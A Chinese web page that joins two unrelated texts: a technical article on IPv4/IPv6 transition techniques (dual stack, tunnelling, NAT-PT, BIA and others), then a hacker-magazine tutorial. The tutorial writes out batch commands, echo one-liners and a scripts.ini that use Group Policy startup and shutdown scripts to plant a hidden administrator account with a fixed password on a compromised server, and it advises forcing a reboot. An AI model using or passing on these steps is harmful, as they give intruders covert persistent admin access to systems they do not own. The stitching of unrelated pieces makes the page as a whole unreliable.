  网络演进的策略(从边缘到骨干还是从骨干到边缘)一直是IPv4/v6综合组网技术研究中有较多争论的问题。一般认为,IPv6技术在网络中的引入主要是为解决IP地址空间不足的问题,而大量消耗IP地址的是网络的边缘,因为网络的终端、接入设备、汇集设备数量远远多于城域核心网络或骨干网络的网元数目,因此在网络边缘采用IPv6技术可以有效地解决IP地址空间不足的问题。另一方面,骨干网络和城域核心网络的设计原则是简单、高效,而就目前的实际情况来讲,IPv6路由器的路由转发性能低于IPv4路由器的性能,因此在城域核心网和骨干网应该采用IPv4协议,目前还没有对这部分网络进行IPv6协议升级的迫切需求。保证核心网和骨干网的长期相对稳定有利于网络的持续稳定发展,因此从边缘到骨干的网络逐步演进策略得到了大多数研究人员的认同。

  (3)综合组网后网络管理功能应该较原有网络有所加强

  在电信网络中引入IP技术以后,网络的管理模式和运营模式都不能再按照互联网的相关模式进行,这一点已经得到了越来越多的研究人员的支持。原有IPv4网络所存在的技术、管理方面的问题已经逐步暴露出来,在IPv4/v6综合组网技术的研究中,要同时考虑这两方面的内容,提高网络的可管理性和可维护性。

  (4)应考虑综合组网对用户认证和计费方式的影响

  IP网络的计费和认证问题一直是一个重点研究的热点,这个问题在电信网络中尤为突出,目前在IPv4网络中的计费认证问题已经有了一些解决办法,并且这些办法在实际网络中也得到了一定程度的应用,取得了一些成果。但是,IPv6技术在网络中的引入使得问题变得更为复杂,有时会出现重复计费和认证的现象。

  (5)应考虑对IPv4地址资源的使用效率

  在进行IPv4/v6综合组网时,不同的综合组网技术对于IPv4地址的需求也不相同,有些组网技术依然需要大量的IPv4地址,因此IPv4地址的需求量也是综合组网技术研究中应该注意的一个问题。

  (6)应考虑为终端用户所能带来的好处(业务、兴趣点等)

  在IPv4网络中引入IPv6技术,可以解决运营商的IP地址空间不足的问题。但是,网络的这种升级究竟能为终端用户带来什么好处,或者说,终端用户有什么理由要支持这种升级是一个需要考虑的问题。网络升级以后能够提供更好的服务或者可以增加新的业务种类,并形成新的业务兴趣点是刺激终端用户积极跟进的重要因素。网络升级以后,只有用户的增加、用户对网络满意度的提高、业务收入的增长才能够真正推动运营商对网络升级改造的进程。

  (7)各电信运营商应该有明确的网络过渡计划

  网络的升级是一个牵涉到网络各个层面的重要问题,因此运营商应该有一个长远的规划和具体的实施计划,这种规划和计划应该和企业的技术路线和网络发展方向相一致,避免网络升级过渡的盲目性以及由此带来的诸多混乱。

  (8)综合组网时应统筹考虑到对现有IPv4网络中存在的一些问题的改进(NAT,地址规划等)

  在IPv4/v6综合组网技术研究时要充分分析和研究现有IPv4网络中所存在的问题,以期在综合组网方案中能够解决或者避免这些问题。

  (9) 网络的各个部分之间的技术选择应该具有独立性,如城域核心网、接入网、驻地网应该可以选择不同的技术。

  3 现有综合组网技术

  3.1 双栈策略

  双栈策略是指在网元中同时具有IPv4和IPv6两个协议栈,它既可以接收、处理、收发IPv4的分组,也可以接收、处理、收发IPv6的分组。对于主机(终端)来讲,“双栈”是指其可以根据需要来对业务产生的数据进行IPv4封装或者IPv6封装。对于路由器来讲,“双栈”是指在一个路由器设备中维护IPv6和IPv4两套路由协议栈,使得路由器既能与IPv4主机也能与IPv6主机通信,分别支持独立的IPv6和IPv4路由协议,IPv4和IPv6路由信息按照各自的路由协议进行计算,维护不同的路由表。IPv6数据报按照IPv6路由协议得到的路由表转发,IPv4数据报按照IPv4路由协议得到的路由表转发。

  3.2 隧道策略

  隧道策略是IPv4/v6综合组网技术中经常使用到的一种机制。所谓“隧道”,简单地讲就是利用一种协议来传输另一种协议的数据技术。隧道包括隧道入口和隧道出口(隧道终点),这些隧道端点通常都是双栈节点。在隧道入口以一种协议的形式来对另外一种协议数据进行封装,并发送。在隧道出口对接受到的协议数据解封装,并做相应的处理。在隧道的入口通常要维护一些与隧道相关的信息,如记录隧道MTU等参数。在隧道的出口通常出于安全性的考虑要对封装的数据进行过滤,以防止来自外部的恶意攻击。

  隧道的配置方法分为手工配置隧道和自动隧道,而自动配置隧道又可以分为兼容地址自动隧道,6to4隧道,6over4,ISATAP,MPLS隧道,GRE隧道等,这些隧道的实现原理和技术细节都不相同,相应的其应用场景也就不同。

  典型的隧道技术主要包括:

  (1)配置隧道

  手工配置隧道主要应用在个别IPv6主机或网络需要通过IPv4网络进行通信的场合,这种方式的优点是实现相对简单,缺点是扩展性较差,表现在当需要通信的IPv6主机或网络比较多时,隧道配置和维护的工作量较大。

  (2)6to4隧道

  6to4隧道是自动隧道的一种,也是IETF较为重视、并得到深入研究、有广阔应用前景的一种网络过渡机制。6to4隧道的主要应用环境是,它可以使连接到纯IPv4网络上的孤立的IPv6子网或IPv6站点与其它同类站点在尚未获得纯IPv6连接时彼此间进行通信。

  (3)兼容地址自动隧道

  兼容地址自动隧道是自动隧道的一种,在IETF的RFC中进行规定,但是目前已经不推荐使用这种隧道方式。

  (4)6over4

  6over4机制通常只能应用在网络边缘,例如企业网和接入网。6over4能够将没有直接与IPv6路由器相连的孤立的IPv6主机通过IPv4组播域作为它们的虚拟链路层形成IPv6的互联。通过这种机制,IPv6可以独立于底层的链路,可以跨越支持组播的IPv4子网。6over4机制由于要求在IPv4网络中支持组播功能,而目前大多数网络均没有布置组播功能,因此在实际应用中很少被利用。

  (5)隧道代理

  隧道代理通常应用于独立的小型的IPv6站点,特别是独立的分布在IPv4互联网中的IPv6主机需要连接到已有的IPv6网的情况。隧道代理(TB)提供一种简化配置隧道的方法,可以减少繁重的隧道配置工作。隧道代理的思想就是通过提供专用的服务器作为隧道代理,自动地管理用户发出的隧道请求。用户通过Tunnel Broker能够方便和IPv6网络建立隧道连接,从而访问外部可用的IPv6资源。隧道代理这种过渡机制对于在IPv6的早期为吸引更多的IPv6使用者能方便快捷地实现IPv6连接有很大的益处,同时也为早期的IPv6提供商提供了一种非常简捷的接入方式。

  (6)ISATAP

  ISATAP机制(the Intra-site Automatic Tunnel Addressing Protocol,站内自动隧道寻址协议)在IETF的RFC中进行定义,通常应用在网络边缘,如企业网或接入网。ISATAP可以和6to4技术联合使用,可以使IPv4站点内的双栈节点通过自动隧道接入到IPv6路由器,允许与IPv6路由器不共享同一物理链路的双栈节点通过IPv4自动隧道将数据包送达IPv6下一跳。

  (7)MPLS隧道

  MPLS隧道主要应用于骨干网和城域核心网。MPLS隧道实现IPv6岛屿互联的方式,尤其适合于已经开展了BGP/MPLS VPN业务的运营商。这种过渡方式可以使运营商暂时不必将现有核心网络升级为IPv6网络就可以实现对外提供IPv6业务。

  IPv6站点必须通过CE连接到一个或多个运行MP-BGP的双栈PE上,这些PE之间通过MP-BGP来交换IPv6的路由可达信息,通过隧道来传送IPv6数据包。

  (8)二层隧道

  为了连接分散的IPv6网络,一种可能的方法是利用二层技术(如ATM,PPP,L2TP等)把这些IPv6网络连接在一起。这种方式的优点是概念清晰、易于理解。缺点是实现较为困难,扩展性较差,当需要互联的IPv6网络较多时,不宜采用这种方式。

  3.3 翻译策略

  在网络的过渡时期不可能要求所有的主机或终端都升级支持双栈,在网络中必然存在纯IPv4主机和纯IPv6主机之间进行通信的需求,由于协议栈的不同很自然地需要对这些协议进行翻译转换。对于协议的翻译涉及两个方面,一方面是IPv4与IPv6协议层的翻译,另一个方面是IPv4应用与IPv6应用之间的翻译。翻译策略可以对应多种实现技术,其中NAT-PT和TRT主要应用于网络汇聚层,而BIA,BIS则主要是针对主机终端而提出的。

  (1)NAT-PT

  NAT-PT网关能够实现IPv4和IPv6协议栈的互相转换,包括网络层协议、传输层协议以及一些应用层协议之间的互相转换,原有的各种协议可以不加改动就能与新的协议互通,但该技术在应用上有一些限制:

  ●在拓扑结构上要求一次会话中双向数据包的转换都在同一个路由器上完成,因此地址/协议转换方法较适用于只有一个路由器出口的网络;

  ●一些协议字段在转换时不能完全保持原有的含义。

  (2)TRT

  传输中继转换器简称“TRT”(Transport Relay Translator)适用于纯IPv6网络与纯IPv4网络通信的环境。TRT系统位于纯IPv6主机和纯IPv4主机之间,可以实现(TCP,UDP)/IPv6与(TCP,UDP)/IPv4的数据的对译。传输中继可以分为TCP中继和UDP中继两类。

  TRT与NAT-PT的最大区别是,TRT做为中继,在TCP/UDP层面以代理的身份来沟通双方,例如TCP中继分别与TCP通信的双方建立TCP连接,双方的所有TCP通信均由TCP中继来中转,而NAT-PT则只起翻译作用,并不代理通信。

  (3)BIS

  BIS技术是在双栈主机中添加若干个模块(翻译器、扩展域名解析器、地址映射器),用于监测TCP/IP模块与网卡驱动程序之间的数据流,并进行相应IPv4与IPv6数据包之间的相互翻译。当与其他IPv6主机进行通信时,在这台主机内部给对应IPv6主机分配一些IPv4地址,这些地址只在这台主机内部使用。而且,这种分配过程是通过DNS协议自动来完成的。主机可以使用现有的IPv4应用和其他IPv6主机进行通信,使其成为能够既支持IPv4应用又同时支持IPv6应用的双栈主机,从而扩大了双栈主机的应用领域。此外,BIS机制还可以和其他的转换机制共存。

  (4)BIA

  BIA技术在双栈主机的Socket API模块与TCP/IP模块之间加入一个API翻译器,它能够在IPv4的Socket API函数和IPv6的Socket API函数间进行互译,这种机制简化了IPv4和IPv6间的转换,无需进行IP头的翻译。

  采用BIA的双栈主机假定在本地节点上同时存在TCP/IPv4和TCP/IPv6两种协议栈。当双栈主机上的IPv4应用程序与其他IPv6主机通信时,API翻译器检测到IPv4应用程序中的Socket API函数,并调用IPv6的Socket API函数与IPv6主机通信,反之亦然。

  4 综合组网技术的比较分析

  在IPv4/v6综合组网具体技术的选择时要重点考虑如下几个重要因素:

  (1)扩展性(Scalability)

  扩展性一方面是指某种组网技术能否支持网络平滑的升级,扩展性较差的技术虽然会解决目前的问题,但同时也会成为网络升级的障碍。另一方面是指,在网络的各个部分采用的不同技术之间是否存在制约,如某个网络的部分采用了6to4机制,则要求与其通信的其他网络部分也要支持这种机制(采用6to4路由器或6to4中继器)。

  (2)安全性(Security)

  安全性包括多个方面:首先,组网技术是否会破坏原网络的安全性。其次,组网技术本身是否存在安全漏洞或隐患。

  (3)性能(Performance)

  组网技术的性能包括其对原有网络的网络性能的影响、其自身的网络性能如何两方面。

  (4)主机需求(Requirements of Hosts)

  主要需求包括协议栈、IPv4地址(全局还是临时、如何获得和管理)需求、IPv6地址(地址类型、分配策略等)需求等。

  (5)路由器需求(Requirements of Routers)

  (6)IPv4地址需求(IPv4 Address Requirement)

  当在网络中按照某个组网技术组网时,其对IPv4地址的需求量如何,需要全局地址还是临时地址,地址如何管理等。

  (7)IPv6地址需求(IPv4 Address Requirement)

  (8)易用性(Ease of Use)

  组网技术的复杂性直接制约了其应用的范围,一个复杂的、不易理解的组网技术对网络的采用会带来诸多问题(维护与管理、实施成本等)。

  (9)易管理性(Ease of Management)

  (10)应用场景与应用阶段(Application Scenarios and Phase)

  每种网络迁移策略及其相应的组网技术均有其各自的优点和缺点,有着各自的适用环境,这些特性直接影响了在综合组网中组网技术的选择。

  (11)其他因素(Other Factors)

  IPv6技术增加了一些和网络安全、QoS保证等方面的支持能力,但是在一些综合组网环境中,这些附加的特性可能不能得以体现。

  5 结束语

  本文对IPv4/v6综合组网时应遵循的基本原则、涉及的主要策略和相应技术进行了分析,对于了解IPv4/6综合组网技术、设计IPv4/6综合组网方案有一定的帮助。
2005年12月23日

大家看过“我非我[F.S.T]”总结的提升管理员权限8法,现在我们利用启动脚本和批处理在获得shell的情况下提升权限第9法: 启动脚本法!!首家批漏啊,大家可得看好了,我尽量废话少说,言简意赅的表述。
注:启动脚本是邀请用户登录之前运行的批文件,它的功能类似于Win9X和DOS中的自动执行批处理文件autoexec.bat,由于脚本是在windows登陆之前运行,所以我们可以修改脚本内容来对系统进行设置,如启动一个后门程序,添加一个管理员帐号,修改管理员帐号等等,随你想吧.嘎嘎..
本文首先介绍通过webshell添加一个隐藏帐号(毕竟这才是大家最关心的:)),然后具体讲解一下出现问题后的解决方法.如何添加一个帐号?
一.如果你可以直接写文件,如用海洋.
(1) 首先,我们用海洋编写了一个新建管理员的批处理文件swords1.bat,如下:
net user swords$ eviloctal /add
net localgroup administrators swords$ /add
这个批处理文件加了一个管理员名为swords$,密码为eviloctal的隐藏帐户,将文件swords1.bat保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup"下.
(注意:c:\winnt是系统目录,如果系统盘不是c盘,请相应修改为系统目录即可.在本机中查看,你也许找不到GroupPolicy\Machine\Scripts\Startup这个文件夹,可以选择工具/文件夹选项/查看/单击显示所有文件和文件夹.在海洋中用fso可以显示所有文件就不必多此一举了。)
(2)接下来编写一个删除管理员的批处理文件swords2.bat,很简单,一句话即可,如下: net user swords$ /del
这个批处理文件删除一个管理员名为swords$的隐藏帐户,将文件swords2.bat保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown"下.
(3)编写一个启动/关机脚本配置文件scripts.ini
(注意:scripts是默认的配置文件名,不能改名!)如下:
[Startup]
0CmdLine=swords1.bat
0Parameters=
[Shutdown]
0CmdLine=swords2.bat
0Parameters=
将文件scripts.ini保存到C:\winnt\system32\GroupPolicy\Machine\Scripts下.
二.如果你有一个cmdshell,有echo的权限就可以了,这样添加:
(1)echo一个swords1.vbs启动时用的文件
echo on error resume next> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup \swords1.vbs
echo net user swords$ eviloctal /add>> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup\swords1.vbs
echo net localgroup administrators swords$ /add>> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup\swords1.vbs
注意:第一行一定要用’>’,这样才能删除原数据.
(2)echo一个swords2.vbs关闭时用的脚本文件
echo net user swords$ /del> C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown\swords2.vbs
(3)编写一个启动/关机脚本配置文件scripts.ini
echo [Startup] > C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini
echo 0CmdLine=swords1.vbs >>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini
echo 0Parameters= >>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini
echo [Shutdown] >>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini
echo 0CmdLine=swords2.vbs>>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini
echo 0Parameters=>>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini
将文件scripts.ini保存到C:\winnt\system32\GroupPolicy\Machine\Scripts下.
最后,等待服务器重新启动计算机或自己强制其启动(手段很多啊)。然后你就等着玩吧。
注意:本方法使用时,须服务器已经指派了计算机启动脚本,否则本方法可能不成功。
三.如果你是本机,或已经连接了对方的3389,但是只有普通用户权限,怎么办?
在启用计算机启动/关机脚本前,必须进行指派.指派计算机启动/关机脚本需要通过组策略MMC(管理控制台)管理单元进行:
(1) 开始/运行/MMC,打开微软控制台
(2) 按ctrl+M键,打开添加/删除管理单元窗口,单击添加。
(3) 在"添加独立管理单元"对话框内选择"组策略",点击"添加"按钮.
(4) 择缺省的"本地计算机"组策略对象/完成/确定/确定,关闭窗口。
(5) 在生成的“本地计算机”策略中打开计算机配置/Windows设置/脚本(启动/关闭)"节点,双击"启动"或"关机"项目设置计算机启动或关机时使用的脚本,单击浏览加如您要启动的脚本文件,确定。
(6)设置完毕,保存后退出组策略MMC管理单元。等组策略刷新后,这些脚本就会在计算机启动和关机时起作用。
注意:你也可以直接打开gpedit.msc, 依次展开计算机配置/Windows设置/脚本(启动/关闭),然后添加一个启动脚本。然后依次展开“计算机配置/管理模板/系统/登陆,将“显示启动脚本的运行状态”启用。重新启动之后看看吧,打开cmd,输入net user swords$显示详细的信息,噶噶,多了一个用户吧。

作者: swords
来 源: 《黑客防线》